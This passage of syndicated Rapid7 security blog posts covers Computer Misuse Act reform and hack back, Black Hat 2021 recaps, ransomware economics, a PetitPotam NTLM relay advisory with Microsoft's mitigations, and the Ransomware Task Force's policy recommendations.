(ii)  take reasonable steps, with regard to any information obtained without authorization, to minimize the information the person obtains, retains, and discloses to only that information which the person reasonably believes is directly necessary to test, investigate, or mitigate a security flaw or vulnerability;

(iii) take reasonable steps to disclose any security vulnerability derived from such activity to the owner of the protected computer or the Cybersecurity and Infrastructure Security Agency prior to disclosure to any other party

(iv) wait a reasonable amount of time before publicly disclosing any security flaw or vulnerability derived from such activity, taking into consideration the following:

(I) the severity of the vulnerability,

(II) the difficulty of mitigating the vulnerability,

(III) industry best practices, and

(IV) the willingness and ability of the owner of the protected computer to mitigate the vulnerability;

(v) not publicly disclose information obtained without authorization that is

(I) a trade secret without the permission of the owner of the trade secret; or

(II) the personally identifiable information of another individual, without the permission of that individual; and

(vi) does not use a nonpublic security flaw or vulnerability derived from such activity for any primarily commercial purpose prior to disclosing the flaw or vulnerability to the owner of the protected computer or the [government vulnerability coordination body].

(B) For purposes of subsection (A), it is not a public disclosure to disclose a vulnerability or other information derived from good faith security research to the [government vulnerability coordination body].

  • What happens if a researcher does not find anything to report? Some proposals for reforming the CMA  have suggested requiring coordinated disclosure as a predicate for a research carve out. This only works if the researcher actually finds something worth reporting. What happens if they do not? Is the research then not defensible?
  • Are we balancing the rights and safety of others with the need for security? For example, easing restrictions for threat intel investigators and security researchers may create a misalignment with existing privacy legislation. This may require balancing controls to protect the rights and safety of others.

The line between legitimate research and hack back

In discussions on CMA reform, we often hear the chilling effect on security research being lumped in with arguments for expanding authorities for threat intelligence gathering and operations. The latter sound alarmingly like requests for private-sector hack back (despite assertions otherwise). We believe it is critical that policymakers understand the distinction between acknowledging the importance of good-faith security research on the one hand and authorizing private-sector hack back on the other.

We understand private-sector hack back to mean an organization taking intrusive action against a cyber-attacker on technical assets or systems not owned or leased by the entity taking action or their client. While threat intel campaigners may disclaim hack back, in asking for authorization to take intrusive action on third-party systems — whether to better understand attacks, disrupt them, or even recapture lost data — they’re certainly satisfying the description of hack back and raising a number of concerns.

Rapid7 is strongly opposed to private-sector hack back. While we view both independent, good-faith security research and threat intelligence investigations as critical for security, we believe the two categories of activity need separate and distinct legal restrictions.

Good-faith security research is typically performed independently of manufacturers and operators in order to identify flaws or exposures in systems that provide opportunities for attackers. The goal is to remediate or mitigate these issues so that we reduce opportunities for attackers and decrease the risk for technology users. These activities often need to be undertaken without authorization to avoid blowback from manufacturers or operators that prioritize their reputation or profit above the security of their customers.

This activity is about protecting the safety and privacy of the many, and while researchers may take actions without authorization, they only do so on the technology of those ultimately responsible for both creating and mitigating the exposure. Without becoming aware of the issue, the technology provider and their users would continue to be exposed to risk.

In contrast, threat intel activities that involve interrogating or interacting with third-party assets prioritize the interests of a specific entity over those of other potential victims, whose compromised assets may have been leveraged in the attack. While threat intelligence can be very valuable in helping us understand how attackers behave — which can help others identify or prepare for attacks — data gathering and operations should be limited to assessing threats to assets that are owned or operated by the authorizing entity, or to non-invasive activities such as port scanning. More invasive activities can result in unintended consequences, including escalation of aggression, disruption or destruction for innocent third parties, and a quagmire of legal liability.

Because cyber attacks are criminal activity, if more investigation is needed, it should be undertaken with appropriate law enforcement involvement and oversight. We see no practical way to provide appropriate oversight or standards for the private sector to engage in this kind of activity.

Comparison to the CFAA

This issue also arises in the CFAA. In fact, it’s exacerbated by the CFAA enabling private entities to pursue civil causes of action, which mean technology manufacturers and operators can seek to apply the CFAA in private cases against researchers. This is often done to protect corporate reputations, likely at the expense of technology users who are being exposed to risk. These private civil actions chill security research and account for the vast majority of CFAA cases and lawsuit threats focused on research. One of Rapid7’s recommendations to the UK Home Office was that the CMA should not be updated to include civil liability.

Washington State has helped protect good-faith security research in its Cybercrime Act (Chapter 9A.90 RCW), which both addresses the issue of defining authorization and exempts white-hat security research.

It’s also worth noting that the U.S. has an exemption for security research in Section 1201 of the Digital Millennium Copyright Act (DMCA). It would be good to see the UK government consider something similar for the Copyright, Designs and Patents Act 1988.

Clarifying authorization

At its core, the CMA effectively operates as a law prohibiting digital trespass and hinges on the concept of authorization. Four of the five classes of offenses laid out in the CMA involve “unauthorized” activities:

1. Unauthorised access to computer material.

2. Unauthorised access with intent to commit or facilitate commission of further offences.

3. Unauthorised acts with intent to impair, or with recklessness as to impairing, operation of computer, etc.

3ZA.Unauthorised acts causing, or creating risk of, serious damage

Unfortunately, the CMA does not define authorization (or the lack thereof), nor detail what authorization should look like. As a result, it can be hard to know with certainty where the legal line is truly being drawn in the context of the internet, where many users don’t read or understand lengthy terms of service, and data and services are often publicly accessible for a wide variety of novel uses.

Many people take the view that if something is accessible in public spaces on the internet, authorization to access it is inherently granted. In this view, the responsibility lies with the owner or operator to ensure that if they don’t want to grant access to something, they don’t make it publicly available.

That being the case, the question becomes how systems owners and operators can indicate a lack of authorization for accessing systems or information in a way that scales, while still enabling broad access and innovative use of online services. In the physical world, we have an expectation that both public and private spaces exist. If a space is private and the owners don’t want others to access it, they can indicate this through signage or physical barriers (walls, fences, or gates). Currently, there is no accepted, standard way for owners and operators to set out a “No Trespassing” sign for publicly accessible data or systems on the internet that truly serves the intended purpose.

Rapid7’s recommendation

While a website’s Terms of Service (TOS) can be legally enforceable in some contexts, in our opinion the Home Office should not take the position that violations of TOS alone qualify as “unauthorized acts.” TOS are almost always ignored by the vast majority of internet users, and ordinary internet behavior may routinely violate TOS (such as using a pseudonym where a real name is required).

Reading TOS also does not scale for internet-wide scanning, as in the case of automated port scanning and other services that analyze the status of millions of publicly accessible websites and online assets. In addition, if TOS is “authorization” for the purposes of the CMA, it gives the author of the TOS the power to define what is and isn’t a hacking crime under CMA section 1.

To address this lack of clarity, the CMA needs a clearer explanation of what constitutes authorization for accessing technical systems or information through the internet and other forms of connected communications.

Comparison with the CFAA

This issue absolutely exists with the CFAA and is at the core of many of the criticisms of the law. Multiple U.S. cases have rejected the notion that TOS violations alone qualify as “exceeding authorization” under the CFAA, creating a split in the courts. The U.S. Supreme Court’s recent decision on Van Buren v. United States confirmed TOS is an insufficient standard, noting that if TOS violations alone qualify as unauthorized act for computer crime purposes, “then millions of otherwise law-abiding citizens are criminals.”

Next steps

We hope the Home Office will take these concerns into consideration, both in terms of ensuring the necessary support for security testing tools and security research, and also in being cautious not to go so far with authorities that we open the door to abuses. We’ll continue to engage on these topics wherever possible to help policymakers navigate the nuances and keep advancing security.

You can read Rapid7’s full response to the Home Office’s CFI or our detailed CMA position.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Black Hat 2021: Rapid7 Experts Share Key Day 2 Takeaways

Post Syndicated from Aaron Wells original https://blog.rapid7.com/2021/08/06/black-hat-recap-2/

Black Hat 2021: Rapid7 Experts Share Key Day 2 Takeaways

Here we are again, back for another day of Rapid7 expert debriefings and analysis for some of the most talked-about Black Hat sessions of this year. So without further delay, let’s take it away!

Get more DEF CON 2021 insights from our Research team on Tuesday, August 10

Sign up for our What Happened in Vegas webinar

Detection and Response



Black Hat 2021: Rapid7 Experts Share Key Day 2 Takeaways

Key takeaways

  • How do human behaviors — learned or learning — factor into incident response? Depending on the volume of stakeholders, your team may be under varying extremes of action bias. As in, are speedy actions being prioritized on vulnerabilities that don’t present a high risk profile? Is speed even possible if mitigating actions must suddenly be learned? Vendors have caught on, practicing “Security Theater”— peddling solutions to problems that might not present real risks.
  • Tangential to the previous topic, a question arises when exploring the weaponization of C2 channels: Due to the unlikelihood of an attack via, say, LDAP attributes when establishing C2, does it make sense to roll out an entirely new detection-and-response plan? Many different conditions must be met for an attacker to gain access in the wild, but teams might already have similar responses in place, on the off chance it happens.
  • Zooming out to a topic with broader public appeal, let’s consider how companies use — and abuse — our personal data. An 18-month test run by a professor and a group of students at Virginia Tech revealed how unlikely it is we’ll be able to predict which companies will abuse personal information after someone, say, creates login credentials for a TikTok account and the company launches cookie tracking for that person.

Vulnerability Risk Management



Black Hat 2021: Rapid7 Experts Share Key Day 2 Takeaways

Key takeaways

  • Are Microsoft Exchange Servers creating an entirely new attack surface via Client Access Services (CAS)? Exchange architecture is incredibly complex, so it contains multitudes when it comes to vulnerabilities. CAS ties front-end and back-end services together, receiving the front-end request through a variety of protocols, including some extremely geriatric ones like POP3 and IMAP4. These legacy protocols are contributing to expanded attack surfaces.
  • Vulnerability Exploitability eXchange (VEX) helps teams rethink security advisories and what it means to be vulnerable. Essentially, it enables software providers to communicate they’re not affected by a vulnerability. Two advantages of VEX are 1) that creation and management of vulnerabilities are automated, and 2) that its results are machine-readable.  
  • Open-source software (OSS) is incredible… and incredibly vulnerable. There are so many risks with OSS that a vendor might even put off patching a vulnerability — for whatever business reason — if alerted to it. There’s currently no mechanism to secure so many classes of vulnerabilities in OSS, but maybe there should be. Researchers should work together to create those class-eliminating mechanisms, ultimately reducing the lift when it comes to risk management.

Research and Policy



Black Hat 2021: Rapid7 Experts Share Key Day 2 Takeaways

Key takeaways

  • What is Electromagnetic Fault Injection (EMFI)? It’s when hardware attackers use electromagnetism to hack hardware chips. When it comes to something like a car’s modern combustion engine, EMFI can be leveraged to change a vehicle’s performance, slithering past manufacturer-imposed security protocols. Some owners are beginning to “tune” chips with EMFI in order to push the limits of their vehicles.
  • There’s cause for concern that AI security products are simply repeating back to us the tables on which they were trained. If this is the case, can someone create more nefarious tables to sway AI security entities away from actual security? Attackers can now train explainable AI models on private data, turning them into the latest tool in their arsenals. Consider your attack surface expanded.
  • When companies export their technology beyond their own borders, it isn’t as easy as it sounds in a press release. Whereas policy constantly lagged behind technology, it’s starting to catch up as companies realize the cost of doing business with both digital authoritarians and digital democracies. Is proprietary tech compromised when entering a new country where it must adhere to each and every law imposed on it by local regulators?

Thanks for joining the Rapid7 team at another round of Black Hat debriefings. We hope to see you live and in person in Vegas next year. Until then, stay secure and stay safe!

And if you’re not ready to walk away from the table just yet, revisit our Day 1 takeaways, or sign up now to hear our Research team’s behind-the-scenes insights on DEF CON 2021 at the What Happened in Vegas webinar on Tuesday, August 10.

Slot Machines and Cybercrime: Why Ransomware Won’t Quit Pulling Our Lever

Post Syndicated from Erick Galinkin original https://blog.rapid7.com/2021/08/06/slot-machines-and-cybercrime-why-ransomware-wont-quit-pulling-our-lever/

Slot Machines and Cybercrime: Why Ransomware Won't Quit Pulling Our Lever

The casino floor at Bally’s is a thrilling place, one that loads of hackers are familiar with from our time at DEF CON. One feature of these casinos is the unmistakable song of slots being played. Imagine a slot machine that costs a dollar to play, and pays out $75 if you win what probability of winning would it take for you to play?

Naively, I’d guess most people’s answers are around “1 in 75” or maybe “1 in 74” if they want to turn a profit. One in 74 is a payout probability of about 1.37%. Now, at 1.37%, you turn a profit, on average, of $1 for 74 games so how many times do you play? Probably not that many. You’re basically playing for free but you’re not pulling much off $1 profit per 74 pulls. At least on average.

But what if that slot machine paid out about half the time, giving you $75 every other time you played? How many times would you play?

This is the game that ransomware operators are playing.

Playing Against the Profiteers

Between Wannacry, the Colonial Pipeline hack, and the recent Kaseya incident, everyone is now familiar with supply chain attacks — particularly those that use ransomware. As a result, ransomware has entered the public consciousness, and a natural question is: why ransomware? From an attacker’s perspective, the answer is simple: why not?

For the uninitiated, ransomware is a family of malware that encrypts files on a system and demands a payment to decrypt the files. Proof-of-concept ransomware has existed since at least 1996, but the attack vector really hit its stride with CryptoLocker’s innovative use of Bitcoin as a payment method. This allowed ransomware operators to perpetuate increasingly sophisticated attacks, including the 2017 WannaCry attack — the effects of which, according to the ransomware payment tracker Ransomwhere, are still being felt today.

Between the watering hole attacks and exploit kits of the Angler EK era and the recent spate of ransomware attacks targeting high-profile companies, the devastation of ransomware is being felt even by those outside of infosec. The topic of whether or not to pay ransoms — and whether or not to ban them — has sparked heated debate and commentary from folks like Tarah Wheeler and Ciaran Martin at the Brookings Institute, the FBI, and others in both industrial and academic circles. One noteworthy academic paper by Cartwright, Castro, and Cartwright uses game theory to ask the question of whether or not to pay.

Ransomware operators aren’t typically strategic actors with a long-term plan; rather, they’re profiteers who seek targets of opportunity. No target is too big or too small for these groups. Although these analyses differ in the details, they get the message right — if the ransomware operators don’t get paid, they won’t want to play the game anymore.

Warning: Math Ahead

According to Kaspersky, 56% of ransomware victims pay the ransom. Most other analyses put it around 50%, so we’ll use Kaspersky’s. In truth, it’s unlikely we have an accurate number for this, as many organizations specifically choose to pay the ransom in order to avoid public exposure of the incident.

If a ransomware attack costs some amount of money to launch and is successful some percentage of the time, the amount of money made from each attack is:

Slot Machines and Cybercrime: Why Ransomware Won't Quit Pulling Our Lever

We call this the expected value of an attack.

It’s hard to know how many attacks are launched — and how many of those launched attacks actually land. Attackers use phishing, RDP exploits, and all kinds of other methods to gain initial access. For the moment, let’s ignore that problem and assume that every attack that gets launched lands. Ransomware that lands on a machine is successful about 54% of the time, and the probability of payment is 56%. Together, this means that the expected value of an attack is:

Slot Machines and Cybercrime: Why Ransomware Won't Quit Pulling Our Lever

Given the average ransom payment is up to $312,493 as of 2020 — or using Sophos’s more conservative estimate, $170,404 — that means ransomware authors are turning a profit as long as the cost of an attack is less than $127,747.14 (or the more conservative $51,530.17). Based on some of the research that’s been done on the cost of attacks, where high-end estimates put it at around $4,200, we can start to see how a payout of almost 75 times the cost to play becomes an incentive.

In fact, because expected values are linear and the expected value is only for one play, we can see pretty quickly that in general, two attacks will give us double the value of one, and three will triple it. This means that if we let our payout be a random variable X, a ransomware operator’s expected value over an infinite number of attacks is… infinite.

Slot Machines and Cybercrime: Why Ransomware Won't Quit Pulling Our Lever

Obviously, an infinite number of ransomware attacks is not reasonable, and there is a limit to the amount that any individual or business can pay over time before they just give up. But from an ideal market standpoint, the message is clear: While ransoms are being paid at these rates and sizes, the problem is only going to grow. Just like you’d happily play a slot machine that paid out almost half the time, attackers are happy to play a game that gets them paid more than 40% of the time, especially because the profits are so large.

Removing Incentives

So why would ransomware operators ever stop if, in an idealized model, there’s potentially infinite incentive to keep playing? A few reasons:

  1. The value of payments is lower
  2. The cost becomes prohibitive
  3. The attacks don’t work
  4. Nobody is paying

Out of the gate, we can more or less dismiss the notion that payment values will get lower. The only way to lower the value of the payment is to lower the value of Bitcoin to nearly zero. We’ve seen attempts to ban and regulate cryptocurrencies, but none of those have been successful.

In terms of the monetary cost, this is also pretty much a dead end for us. Even if we could remove all of the efficiencies and resilience of darknet markets, that would only remove the lowest-skill attackers from the equation. Other groups would still be capable of developing their own exploits and ransomware.

Ultimately, what our first two options have in common is that they deal, in a pretty direct way, with adversary capabilities. They leave room for adversaries to adapt and respond, ultimately trying to affect things that are in the control of attackers. This makes them much less desirable avenues for response.

So let’s look at the things that victims have control over: defenses and payments.

Defending Against Ransomware

Defending against ransomware is quite similar to defending against other attack types. In general, ransomware is not the first-stage payload delivered by an exploit; instead, it’s dropped by a loader. So the name of the game is to prevent code execution on endpoints. As security professionals, this is something we know quite well.

For ransomware, the majority of attacks come via a handful of vectors, which will be familiar to most security practitioners:

  • Phishing
  • Vulnerable services
  • Weak passwords, especially on Remote Desktop Protocol
  • Exploit kits

Many of these initial access vectors are things that can be kept in check with user training, vulnerability scans, and sound patching practices. Once initial access is established, many of these ransomware operators use software like WMI, PSExec, Powershell, and Cobalt Strike, in addition to commodity malware like Trickbot, to move laterally before hitting the entire network with ransomware.

Looking for these indicators of compromise is one way to limit the potential impact of ransomware. But of course, these techniques are hard to detect, and no organization is able to catch 100% of the bad things that are coming at them. So what do victims do when the worst happens?

Choosing Not to Pay

When ransomware attacks are successful, victims have two primary choices: pay or don’t. There are many follow-on decisions from each of these decisions, but the first and most critical decision (for the attacker) is whether or not to pay the ransom.

When people pay the ransom, they’re likely — though not guaranteed — to get their files back. However, because of the significant amounts of first stage implants and lateral movement associated with ransomware attacks, there’s still a lot of incident response work to be done beyond the return of the files. For many organizations, if they don’t have a suitable off-site backup in place, this may feel like an inevitable impact of this type of attack. As Tarah Wheeler pointed out, this is often something that can simply be written off as a business expense. Consequently, hackers get paid, companies get to write off the loss, and nobody learns a lesson.

As we discussed above, when you pay a ransom, you’re paying for the next attack, and according to reports from the UK’s NCSC, you may also be paying for human trafficking. None of us wants to be funding these attackers, but we want to protect our data. So how do we get away from paying?

As we mentioned before, preventing the attacks in the first place is the optimal outcome for us as defenders, but security solutions are never 100% effective. The easiest way not to pay is to have an off-site backup. That will let you invoke your normal incident response process but have your data intact. In many cases, this isn’t any more expensive than paying, and you’re guaranteed to get your data back.

In some cases, a decrypter is available for the ransomware. The decrypters can be used by victims to restore their files without paying the ransom. Organizations like No More Ransomware make decrypters available for free, saving organizations significant amounts of money paying for decryption keys.

Having a network configuration that makes lateral movement difficult will also reduce the “blast radius” of the attack and can help mitigate the spread. In these cases, you may be able to get away with reimaging a handful of employee laptops and accepting the loss. Ultimately, letting people write off their backups instead of their ransom payments encourages the switch to having sensible backup policies and discouraging these ransomware operators.

Why the Wheel Keeps Spinning

Ransomware remains a significant problem, and I hope we’ve demonstrated why: the incentives for everyone, including victims, are there to increase the number of ransomware attacks. Attackers who do more attacks will see more profits, which fund subsequent attacks. While victims can write off their payments, there’s no incentive to take steps to mitigate the impact of ransomware, so the problem will continue.

Crucially, ransomware attackers aren’t picky about their victims. They’re not nation-state actors who seek to target only the largest companies with the most intellectual property. Rather, they’re attackers of opportunity — their victim is anyone who lets their lever be pulled, and as long as the victims keep paying out often enough, attackers are happy to play.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Black Hat 2021: Rapid7 Experts Share Key Day 1 Takeaways

Post Syndicated from Dwayne A. Johnson original https://blog.rapid7.com/2021/08/05/black-hat-recap-1/

Black Hat 2021: Rapid7 Experts Share Key Day 1 Takeaways

OK, no big deal, we know how this goes. Once again, many of us are attending Black Hat in a virtual capacity as COVID-19 meanders its way out of our lives. The good news is that there’s an actual live component again this year in Las Vegas, and that’s progress. Here’s hoping that next year the pandemic will be more firmly in the rearview and any remaining travel trepidation will be a “2021 thing.”    

So flip the on-switch to some neon lights if you got ‘em, and let’s get into what our Rapid7 experts thought were the biggest takeaways from a busy Day 1 of new tools, techniques, and up-to-the-minute information.

Want our daily Black Hat takeaways sent directly to your inbox?

Get started

Detection and Response



Black Hat 2021: Rapid7 Experts Share Key Day 1 Takeaways

Key takeaways

  • Does it make sense for an organization to “roll its own SIEM”? Yes and no (because of course that’s the answer). For very specific use cases outside of the norm, it might make sense to start the often-herculean, cost-prohibitive task of building that cloud-native SIEM to best serve hyper-specific needs. But is it worth it to miss out on the high-quality, actionable intel a commercial vendor brings to the table?  
  • When it comes to distributed malware, attackers are bypassing traditional detection. Return Oriented Programming (ROP — pronounced “rope”) grants attackers a bypass route through initial access points to get onto an endpoint faster and easier. However, the real endgame is to bypass that endpoint agent and hack the network at large.  
  • Just how easy is it to hack a hotel? If you were the victim of a hotel hack, you might think a ghost had taken up residence in your room as your IoT-connected bed suddenly moves up and down. However, the proliferation of unprotected networks and IoT devices in modern hotels has created unprecedented opportunities for attackers to gain nefarious access. A back-to-basics approach might be the best way forward for the hospitality industry.

Vulnerability Risk Management



Black Hat 2021: Rapid7 Experts Share Key Day 1 Takeaways

Key takeaways

  • Open Platform Communications (OPC) standards are a wondrous thing, allowing products across many industries to interact and exchange data efficiently. But is security a priority? When commercial vendors all along a supply chain start making their own customizations to the common legacy protocol, well, security isn’t so secure anymore.
  • Find an active-directory certificate vulnerability? Good luck getting it patched. These configuration-related instances are flaws that larger organizations might be hesitant to acknowledge. Check out this (extremely long, but informative) whitepaper on the subject — and the accompanying blog — from SpecterOps.
  • Printer vulnerabilities aren’t paper-thin. Windows Printer Spooler can offer up an attack surface that leads to an instance like the PrintDemon incident. Some of the larger vulnerabilities see attackers and exploit authors leveraging printer path names.  

Research and Policy



Black Hat 2021: Rapid7 Experts Share Key Day 1 Takeaways

Key takeaways

  • Let’s talk lasers — specifically, how attackers can use them to exploit vulnerabilities in hardware like bitcoin wallets. One would hope that the key material they’re storing in that wallet is secure. However, with a laser you can “look through” a silicon chip to confuse the CPU and bypass security checks.  
  • Wondering how future information wars will be fought? By bots. Advanced bots, that is — those that leverage Generative Pre-Trained Transformer (GPT) language models like GPT-3. With this powerful tool, a small group of people could generate misinformation at scale, quickly spinning up thousands of fake social accounts creating individual posts that sound like actual human language. That’s scary.  
  • As far as we know, AI cannot yet be arrested. However, threat actors can still run afoul of digital crime laws like the Computer Fraud and Abuse Act (CFAA) when they employ adversarial machine learning. This “poisoned data” results in systems learning things they shouldn’t. Current federal and state computer-crime laws need to reflect these more sophisticated AI attack methods so that, you know, the machines don’t win.  

We’ll see you right back here tomorrow for Black Hat Day 2 insights and takeaways from the Rapid7 team!

Want our daily Black Hat takeaways sent directly to your inbox?

Get started

PetitPotam: Novel Attack Chain Can Fully Compromise Windows Domains Running AD CS

Post Syndicated from Caitlin Condon original https://blog.rapid7.com/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/

PetitPotam: Novel Attack Chain Can Fully Compromise Windows Domains Running AD CS

Late last month (July 2021), security researcher Topotam published a proof-of-concept (PoC) implementation of a novel NTLM relay attack christened “PetitPotam.” The technique used in the PoC allows a remote, unauthenticated attacker to completely take over a Windows domain with the Active Directory Certificate Service (AD CS) running — including domain controllers.

PetitPotam works by abusing Microsoft’s Encrypting File System Remote Protocol (MS-EFSRPC) to trick one Windows host into authenticating to another over LSARPC on TCP port 445. Successful exploitation means that the target server will perform NTLM authentication to an arbitrary server, allowing an attacker who is able to leverage the technique to do… pretty much anything they want with a Windows domain (e.g., deploy ransomware, create nefarious new group policies, and so on). The folks over at SANS ISC have a great write-up here.

According to Microsoft’s ADV210003 advisory, Windows users are potentially vulnerable to this attack if they are using Active Directory Certificate Services (AD CS) with any of the following services:

  • Certificate Authority Web Enrollment
  • Certificate Enrollment Web Service

NTLM relay attacks aren’t new — they’ve been around for decades. However, a few things make PetitPotam and its variants of higher interest than your more run-of-the-mill NTLM relay attack. As noted above, remote attackers don’t need credentials to make this thing work, but more importantly, there’s no user interaction required to coerce a target domain controller to authenticate to a threat actor’s server. Not only is this easier to do — it’s faster (though admittedly, well-known tools like Mimikatz are also extremely effective for gathering domain administrator-level service accounts). PetitPotam is the latest attack vector to underscore the fundamental fragility of the Active Directory privilege model.

Microsoft released an advisory with a series of updates in response to community concern about the attack — which, as they point out, is “a classic NTLM relay attack” that abuses intended functionality. Users concerned about the PetitPotam attack should review Microsoft’s guidance on mitigating NTLM relay attacks against Active Directory Certificate Services in KB500413. Since it looks like Microsoft will not issue an official fix for this vector, community researchers have added PetitPotam to a running list of “won’t fix” exploitable conditions in Microsoft products.

The PetitPotam PoC is already popular with red teams and community researchers. We expect that interest to increase as Black Hat brings further scrutiny to Active Directory Certificate Services attack surface area.

Mitigation Guidance

In general, to prevent NTLM relay attacks on networks with NTLM enabled, domain administrators should ensure that services that permit NTLM authentication make use of protections such as Extended Protection for Authentication (EPA) coupled with “Require SSL” for affected virtual sites, or signing features such as SMB signing. Implementing “Require SSL” is a critical step: Without it, EPA is ineffective.

As an NTLM relay attack, PetitPotam takes advantage of servers on which Active Directory Certificate Services (AD CS) is not configured with the protections mentioned above. Microsoft’s KB5005413: Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS) emphasizes that the primary mitigation for PetitPotam consists of three configuration changes (and an IIS restart). In addition to primary mitigations, Microsoft also recommends disabling NTLM authentication where possible, starting with domain controllers.

In this order, KB5005413 recommends:

  • Disabling NTLM Authentication on Windows domain controllers. Documentation on doing this can be found here.
  • Disabling NTLM on any AD CS Servers in your domain using the group policy Network security: Restrict NTLM: Incoming NTLM traffic. For step-by-step directions, see KB5005413.
  • Disabling NTLM for Internet Information Services (IIS) on AD CS Servers in your domain running the “Certificate Authority Web Enrollment” or “Certificate Enrollment Web Service” services.

While not included in Microsoft’s official guidance, community researchers have tested using NETSH RPC filtering to block PetitPotam attacks with apparent success. Rapid7 research teams have not verified this behavior, but it may be an option for blocking the attack vector without negatively impacting local EFS functionality.

Rapid7 Customers

We are investigating approaches for adding assessment capabilities to InsightVM and Nexpose to determine exposure to PetitPotam relay attacks.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

The Ransomware Task Force: A New Approach to Fighting Ransomware

Post Syndicated from Jen Ellis original https://blog.rapid7.com/2021/08/03/the-ransomware-task-force-a-new-approach-to-fighting-ransomware/

The Ransomware Task Force: A New Approach to Fighting Ransomware

In the past few months, we’ve seen ransomware attacks shut down healthcare across Ireland, fuel delivery across parts of the US, and meat processing across Australia, Canada and the US. We’ve seen demands of payments in the tens of millions of dollars. We’re also continuing to see trends around ransomware-as-a-service and double or triple extortion continuing to rise. It’s clear that ransomware attacks are increasing in frequency, breadth, sophistication, scale, and impact.

Recognizing this, the Institute for Security and Technology put together a comprehensive Ransomware Task Force (RTF) to identify new approaches to shift the dynamics of ransomware and reduce opportunities for attackers. The Ransomware Task Force involved more than 60 participants representing a wide range of expertise and experience, including from multiple governments, law enforcement, civil society and public policy nonprofits, and security advancement groups. From the private sector, organizations of all sizes participated, including many that have experienced ransomware attacks firsthand or that are involved in dealing with the fallout, such as cybersecurity companies, law firms, and cyber insurers. Rapid7 was among those that participated — I was one of the co-chairs, and my amazing colleagues, Bob Rudis, Tod Beardsley, and Scott King participated as well.

From the outset, the intent of the Task Force was to look at the issue holistically and come up with a comprehensive set of recommendations to deter and disrupt ransomware attackers, thereby helping organizations prepare for and respond to attacks at scale. Recognizing the scale and severity of the issue — and the need for systemic and societal responses — our target audience was policymakers and government leaders.

The Task Force recognized that ransomware is not a new topic, and we had no desire to rehash previous efforts. Instead, we sought to learn from them and, where appropriate, amplify and extend them, supporting the next period of growth on this thorny issue. Ransomware’s reach and impact are increasing, which has a serious impact on society. The effects are only likely to worsen without significant action from governments and other leaders.

Key recommendations

The final report issued by the Task Force makes 48 recommendations, broken into actions to deter, disrupt, prepare for, and respond to ransomware attacks. The recommendations are designed to work in concert with each other, though we recognize there are a large number of them, and many will take time to implement. In reality, though, there truly is no silver bullet for addressing ransomware, no one thing that will magically solve this problem. If we want to shift the dynamics in a meaningful way that makes it harder for attackers to succeed, we need to make adjustments in a range of areas. It’s also worth noting that the Task Force’s goal was to provide recommendations to government and other leaders, not to provide tactical, technical guidance.

Given there are 48 recommendations, and they are well set out in the report, I won’t go over them now. I’ll just highlight a few of the big themes and, where relevant, what’s happened since the launch of the report.

Make it a top priority

One of the biggest challenges we face with any discussion around cybercrime is that it’s often viewed as a niche technical problem, not as a broad societal issue. This has made it harder to get the required attention and investment in solutions. The Task Force called for senior political leaders to recognize ransomware for what it is: a national security issue and a major threat to our ways of life (Action 1.2.5, page 26). We also called for a whole-of-government approach whereby leaders would engage various stakeholders across the government to help ensure necessary action is taking place collaboratively across the board (Actions 1.2.1 and 1.2.2, page 23).

One possible silver lining of the recent attacks against critical infrastructure is that they’ve helped establish this level of priority. In the US, we’ve seen various parts of the government start to take action: Congress has held hearings and proposed legislation; the Department of Justice has given ransomware investigations similar status to those for terrorism; the Department of Homeland Security has issued new cybersecurity guidelines for pipelines; the White House issued a memo to urge the private sector to take steps to protect against ransomware; and even President Biden has talked about ransomware in press conferences and with other world leaders.

Global action for a global problem

To take meaningful action to reduce ransomware attacks, we must acknowledge the geopolitical aspects. Firstly, the issue affects countries all around the world. Governments taking action should do so in coordination and cooperation in order to amplify the impact and hit attackers on multiple fronts at once (Actions 1.1.1 – 1.1.4, 1.2.6, pages 21-22, 26).

Secondly, and perhaps more crucially, one of the main advantages for attackers is the existence of nations that provide safe havens, because they’re either unwilling or unable to prosecute cybercriminals. This also makes it much harder for other countries to prosecute these criminals, and as such, ransomware attackers rarely seem to fear consequences for their actions.

The Task Force recommended that governments work together to tackle the issue of safe havens and adopt key practices to protect their citizens — or help them better protect themselves (Actions 1.3.1 and 1.3.2, page 27).

We’ve already seen some progress in this regard, as ransomware was raised at the recent G7 Summit, and the resulting communique included the following commitment from members:

“We also commit to work together to urgently address the escalating shared threat from criminal ransomware networks. We call on all states to urgently identify and disrupt ransomware criminal networks operating from within their borders, and hold those networks accountable for their actions.”

It will be interesting to see whether and how the G7 members will follow through on this commitment. I hope they’ll take action, build momentum, and recruit participation from other nations.

Reducing paths to revenue

As mentioned above, we’re seeing attackers demand higher and higher ransoms, which likely attracts other criminals to enter the market. Hopefully, the opposite is also true; if we reduce the opportunity to make money from ransomware, the number of attacks will decrease.

This rationale, coupled with discomfort over the idea of ransom payments being used to fund other types of organized crime — including human trafficking, child exploitation, and weapons trafficking — resulted in a great deal of discussion around the notion of banning ransom payments.

While the Task Force agreed that payments should be discouraged, the idea of a legal prohibition was challenging. Given the lack of real risk or friction for attackers, it’s likely that if payments were outlawed, attackers wouldn’t simply give up. Rather, they’d first play a game of chicken against victims, focusing on the organizations least likely to resist paying — namely providers of critical functions that can’t be disrupted without profound impact on society, or small-to-medium businesses that aren’t financially able to prepare for and weather an attack.

Given the concerns over these practicalities, the Task Force did not recommend banning payments. Rather, we looked at alternative ways of reducing the ease with which attackers realize a profit. There are two main paths to this: reducing the likelihood of victims making a payment, and making it technically harder for attackers to get their payment.

In terms of making victims think twice before making a payment, the RTF recommended a few measures:

  • Requiring the disclosure of payments (Action 4.2.4, page 46): This will help to build greater understanding of what is happening in the attack landscape and may enable law enforcement to build more information on attackers, or even recapture payments.
  • Requiring organizations to conduct cost-benefit analysis prior to making payments (Action 4.3.1 and 4.3.2, pages 47 and 48): This will encourage organizations to look into alternative options for resolution — for example, turning to the No More Ransom Project to seek decryption keys.
  • Creating a fund to assist certain organizations in recovery (Action 4.1.2, page 43): Often, organizations say the cost of recovery significantly outsizes that of the ransom, leaving them no choice but to give into their attacker’s demands. For qualifying organizations, this fund would rebalance the scales and give them a pragmatic alternative to paying the ransom.

